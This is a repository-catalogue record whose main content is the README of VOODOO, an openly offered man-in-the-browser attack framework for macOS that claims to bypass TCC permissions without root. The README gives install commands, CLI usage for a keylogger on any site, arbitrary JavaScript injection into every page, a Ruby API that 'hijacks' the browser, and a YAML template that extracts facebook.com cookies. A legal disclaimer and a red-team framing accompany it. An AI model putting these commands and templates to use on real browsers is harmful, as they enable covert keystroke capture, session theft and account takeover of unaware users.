{"id":13739740,"url":"https://github.com/breakpointHQ/VOODOO","last_synced_at":"2025-05-08T19:34:43.258Z","repository":{"id":43149711,"uuid":"467227970","full_name":"breakpointHQ/VOODOO","owner":"breakpointHQ","description":"Man in the Browser Framework","archived":false,"fork":false,"pushed_at":"2024-12-24T22:09:06.000Z","size":123,"stargazers_count":46,"open_issues_count":0,"forks_count":9,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-04-10T14:35:39.671Z","etag":null,"topics":["brave-browser","chrome","edge-browser","infosec","macos","main-in-the-browser","opera-browser","pentesting","redteam"],"latest_commit_sha":null,"homepage":"","language":"Ruby","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/breakpointHQ.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-03-07T19:16:10.000Z","updated_at":"2025-04-07T07:10:53.000Z","dependencies_parsed_at":"2025-04-10T14:12:28.910Z","dependency_job_id":"8108b72f-ab69-4820-8c2e-5245a6e7e742","html_url":"https://github.com/breakpointHQ/VOODOO","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/breakpointHQ%2FVOODOO","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/breakpointHQ%2FVOODOO/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/breakpointHQ%2FVOODOO/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/breakpointHQ%2FVOODOO/manifests","owner_url":"https
://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/breakpointHQ","download_url":"https://codeload.github.com/breakpointHQ/VOODOO/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253135537,"owners_count":21859663,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["brave-browser","chrome","edge-browser","infosec","macos","main-in-the-browser","opera-browser","pentesting","redteam"],"created_at":"2024-08-03T04:00:37.041Z","updated_at":"2025-05-08T19:34:43.229Z","avatar_url":"https://github.com/breakpointHQ.png","language":"Ruby","funding_links":[],"categories":["[↑](#table-of-contents) Tooling","Tools"],"sub_categories":["Offensive Tools"],"readme":"# VOODOO\nVOODOO is a Man in the browser attack framework for macOS.\nIt comes with built-in keylogging, and scripting capabilities.\nVOODOO is highly extendable \u0026 shareable, it can execute `YAML` templates that define complex attacks.\n\n\u003cp align=\"center\"\u003e\n    \u003cbr /\u003e\n    \u003cimg src=\"./.github/voodoo.svg\" width=\"50%\" /\u003e\n\u003c/p\u003e\n\n## Browser Support\n\n| [\u003cimg src=\"https://raw.githubusercontent.com/alrra/browser-logos/master/src/edge/edge_48x48.png\" alt=\"IE / Edge\" width=\"24px\" height=\"24px\" /\u003e](http://godban.github.io/browsers-support-badges/)\u003cbr/\u003eEdge | [\u003cimg src=\"https://raw.githubusercontent.com/alrra/browser-logos/master/src/chrome/chrome_48x48.png\" alt=\"Chrome\" width=\"24px\" height=\"24px\" /\u003e](http://godban.github.io/browsers-support-badges/)\u003cbr/\u003eChrome | [\u003cimg 
src=\"https://raw.githubusercontent.com/alrra/browser-logos/master/src/opera/opera_48x48.png\" alt=\"Opera\" width=\"24px\" height=\"24px\" /\u003e](http://godban.github.io/browsers-support-badges/)\u003cbr/\u003eOpera | [\u003cimg src=\"https://github.com/alrra/browser-logos/raw/main/src/brave/brave_48x48.png\" alt=\"Brave\" width=\"24px\" height=\"24px\" /\u003e](http://godban.github.io/browsers-support-badges/)\u003cbr/\u003eBrave | [\u003cimg src=\"https://github.com/alrra/browser-logos/raw/main/src/chromium/chromium_48x48.png\" alt=\"Chromium\" width=\"24px\" height=\"24px\" /\u003e](http://godban.github.io/browsers-support-badges/)\u003cbr/\u003eChromium |\n| --------- | --------- | --------- | --------- | --------- |\n| macOS only | macOS only | macOS only | macOS only | macOS only |\n\n## Demo\n[![VOODOO](https://img.youtube.com/vi/4wTpdh06H_o/1.jpg?s)](https://www.youtube.com/watch?v=4wTpdh06H_o)\n\n## Why?\nIn macOS, keylogging, webcam and microphone access usually require TCC permissions. VOODOO bypasses all of this using Chromium-based browser extensions.\n**VOODOO does not require root privileges or any TCC permissions to work.**\n\n## Legal Disclaimer\nUsage of this code for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. 
Only use for educational purposes.\n\n## Features\n* 📜 Content Scripts - inject arbitrary JavaScript to any page\n* 🔑 Keylogger - records user keystrokes on any site\n* 📋 VOODOO Templates - run advanced man-in-the-browser attacks from template files\n\n## Quick start\n```sh\n$: sudo gem install get-voodoo\n```\nOR\n\n```sh\n$: gem install get-voodoo --user-install\n```\n\nWhen installing without `sudo`, make sure that `/Users/[user]/.gem/ruby/[version]/bin` is in your `PATH`.\n\n## Building\n```sh\n$: git clone https://github.com/breakpointHQ/VOODOO.git\n$: cd ./VOODOO\n$: gem build ./voodoo.gemspec\n$: gem install ./get-voodoo-X.X.X.gem\n```\n\n## CLI\n\n```sh\n$: voodoo\nCommands:\n  voodoo help [COMMAND]    # Describe available commands or one specific command\n  voodoo keylogger         # Records user keystrokes\n  voodoo script \u003cjs/path\u003e  # Add a content script\n  voodoo template \u003cpath\u003e   # Execute a VOODOO template\n  voodoo version           # Prints voodoo version\n```\n\n## Adding content script\n\n```sh\n$: voodoo help script\nUsage:\n  voodoo script \u003cjs/path\u003e\n\nOptions:\n  x, [--urls=one two three]         \n  f, [--format=FORMAT]              # pretty, json, payload, none\n                                    # Default: pretty\n  o, [--output=OUTPUT]              # File path\n  p, [--params=key:value]           \n  m, [--matches=one two three]      \n                                    # Default: [\"*://*/*\"]\n  b, [--browser=BROWSER]            \n                                    # Default: chrome\n  p, [--permissions=one two three]  \n      [--max-events=N]              \n\nAdd a content script\n```\n\nExecute JS on every page loaded on the Opera browser.\n```sh\n$: voodoo script \"alert('Hello VOODOO!');\" -b opera\n```\n\nExecute JS on every page that matches `https://example.com/*`\n```sh\n$: voodoo script \"alert('Example VOODOO!');\" -b chrome -m \"https://example.com/*\"\n```\n\nExecute JS on every page loaded on 
Google Chrome, and open `https://example.com`.\n```sh\n$: voodoo script /tmp/myjs.js -b chrome -x \"https://example.com\"\n```\n\n## Intercept browser traffic\n\nThis is no longer supported due to migration to the v3 chrome extension manifest.\n\n## Keylogger\n```sh\n$: voodoo help keylogger\nUsage:\n  voodoo keylogger\n\nOptions:\n  x, [--urls=one two three]     \n  f, [--format=FORMAT]          # pretty, json, payload\n                                # Default: pretty\n  o, [--output=OUTPUT]          # File path\n  m, [--matches=one two three]  \n                                # Default: [\"*://*/*\"]\n  b, [--browser=BROWSER]        \n                                # Default: chrome\n      [--max-events=N]          \n\nRecords user keystrokes\n```\n\nRecord user keys only when the URL matches `https://example.com/*`\n```sh\n$: voodoo keylogger -m \"https://example.com/*\"\n```\n\n## Templates\n\nA VOODOO template is a `YAML` file that is used to define a man in the browser attack.\n\n```sh\n$: voodoo help template\nUsage:\n  voodoo template \u003cpath\u003e\n\nOptions:\n  b, [--browser=BROWSER]     \n  f, [--format=FORMAT]       # json, payload, none\n                             # Default: none\n  o, [--output=OUTPUT]       # File path\n  x, [--urls=one two three]  \n  p, [--params=key:value]    \n      [--max-events=N]       \n\nExecute a VOODOO template\n```\n\nA template must have 3 main blocks: `info`, `scripts`, and `browser`, and 2 optional settings: `format` and `permissions`.\n\n### Information\n\nThe `info` block holds important information about your template. The `info` block provides `name`, `author`, and `description`.\nThe `info` block also supports dynamic fields, so you can define any `key: value` pairs to provide more useful information about the template.\n\nInfo block example:\n```yaml\ninfo:\n  name: Change the Title of example.com\n  author: Mr. 
Test\n  description: Overwrite the contents of the h1 tag in example.com every time the user visits it.\n```\n\n### Scripts\nThe `scripts` block defines the content scripts and background scripts that will be injected into the browser.\nYou can specify the following attributes for each script:\n\n| Name      | Type      | Description | Default |\n| --------- | --------- | --------- | --------- | \n| `matches` | array of strings | Specifies which pages this content script will be injected into. | `*://*/*` |\n| `content` | string | Specifies the JavaScript code that will be executed | `nil` |\n| `file` | string | Specifies the path to a JavaScript file that will be executed | `nil` |\n| `background` | boolean | Specifies whether or not this is a background script | `false` |\n| `communication` | boolean | Specifies whether a `collector` server should be spawned for this script. | `true` |\n\n### Scripts block examples:\n\nInject a content script from a file into every page\n```yaml\nscripts:\n  - matches: \"*://*/*\" # Inject to every page\n    file: ./keylogger.js # A JS file from the same folder as the template file\n```\n\nOverwrite the title of example.com and example.net\n```yaml\nscripts:\n  - matches:\n      - https://example.com/*\n      - https://example.net/*\n    content: document.querySelector('h1').innerText = 'VOODOO Example!';\n```\n\nInject a background script that will report back on every tab update.\n```yaml\nscripts:\n  - content: chrome.tabs.onUpdated.addListener((_,tab) =\u003e VOODOO.send(tab));\n    background: true\n```\n\nA template file looks like this:\n\n```yaml\ninfo:\n  name: Change the Title of example.com\n  author: Mr. 
Test\n  description: Overwrite the contents of the h1 tag in example.com every time the user visits it.\n\nscripts:\n  - matches: https://example.com/*\n    content: document.querySelector('h1').innerText = \"VOODOO Example\";\n\nbrowser:\n  default: opera\n  urls:\n    - https://example.net/\n    - https://example.com/\n```\n\n### JavaScript API\nWhen `communication` is `true`, content and background scripts can access the `VOODOO` object, which exposes the following APIs.\n\n### VOODOO.send(:data)\nWrite data to the selected output format.\n\n| Name      | Type      | Description | Default |\n| --------- | --------- | --------- | --------- | \n| data       | `any`   | the data you would like to write to the selected output format. | `nil` |\n\n### VOODOO.log(:str)\nWrite information to stdout.\n\n| Name      | Type      | Description | Default |\n| --------- | --------- | --------- | --------- | \n| str       | `string`   | the message you would like to write to the VOODOO cli stdout | `nil` |\n\n### VOODOO.kill(:options)\nStop the collector thread.\n\n| Name      | Type      | Description | Default |\n| --------- | --------- | --------- | --------- | \n| options   | `object`  | additional configuration | `{}` |\n| options.close_browser | `boolean`  | when set to `true` the browser process will be killed | `false` |\n\n### Dynamic Parameters\nYou can pass custom parameters to your template using the `--params` option. It accepts key-value pairs in the following format: `name:john age:42`.\nThose values can later be used in your script like this: `%{name}` `%{age}`.\n\nYou can see an example template that uses parameters at `templates/cookie-monster.yaml`.\n\n### Permissions\nThe `permissions` property is used to declare the necessary permissions for your VOODOO script.\nBy default VOODOO sets the following permissions:\n`tabs`, `*://*/*`, `webRequest`\n\nHere is an example of a template that uses the `cookies` permission to extract `facebook.com` cookies.\n```yaml\ninfo:\n  name: 
Cookie Monster\n\nformat: payload\n\npermissions:\n  - cookies\n\nscripts:\n  - content: |\n      chrome.cookies.getAll({domain: \"facebook.com\"}, cookies =\u003e {\n        VOODOO.send(cookies)\n        VOODOO.kill();\n      });\n    background: true\n```\n\n### Browser\nThe `browser` block is a key-value object that defines browser-related settings for the template.\nPlease note, the `name` setting can be overridden using the `--browser` or `-b` CLI option.\nThe `urls` setting can also be overridden using the `--urls` or `-x` CLI options.\n\n| Name      | Type      | Description | Default | \n| --------- | --------- | --------- | --------- |\n| default   | string    | supported browser short name `chrome`, `opera`, `edge`, `brave`, `chromium` | `chrome` |\n| urls      | array of strings | list of urls to open right after we hijack the browser. | `NULL` |\n\n### Format\nThe `format` property sets the default output format for the template.\nPlease note, this setting can be overridden using the `--format` or `-f` CLI option.\n\n```yaml\ninfo:\n  name: Title Spy\n  description: Extract the title from any https site the user visits\n\nformat: payload\n\nscripts:\n  - matches: https://*/*\n    content: 'VOODOO.send({title: document.title})'\n\nbrowser:\n  default: opera\n```\n\n## Ruby API\n\nThe underlying Ruby API can also be used for advanced integrations.\n\n```rb\nrequire 'voodoo'\n\nbrowser = VOODOO::Browser.Chrome\n                       # .Opera\n                       # .Edge\n                       # .Chromium\n\n# Execute JS on example.com\nbrowser.add_script(content: 'alert(\"VOODOO Example!\");',\n                   matches: 'https://example.com/*')\n\n# Inject a keylogger to every page\nbrowser.keylogger do |event|\n    print event[:payload][:log]\nend\n\n# hijack the browser, and open example.com\nbrowser.hijack 'https://example.com'\n```\n\n## Development\n\nRunning project tests\n```sh\n$: bundle exec rake test\n```\n\n## Contributing\n* File an issue 
first prior to submitting a PR!\n* If applicable, submit a test suite against your PR\n\n## TO DO\n* Windows/Linux support\n* Ruby API documentation\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FbreakpointHQ%2FVOODOO","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FbreakpointHQ%2FVOODOO","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FbreakpointHQ%2FVOODOO/lists"}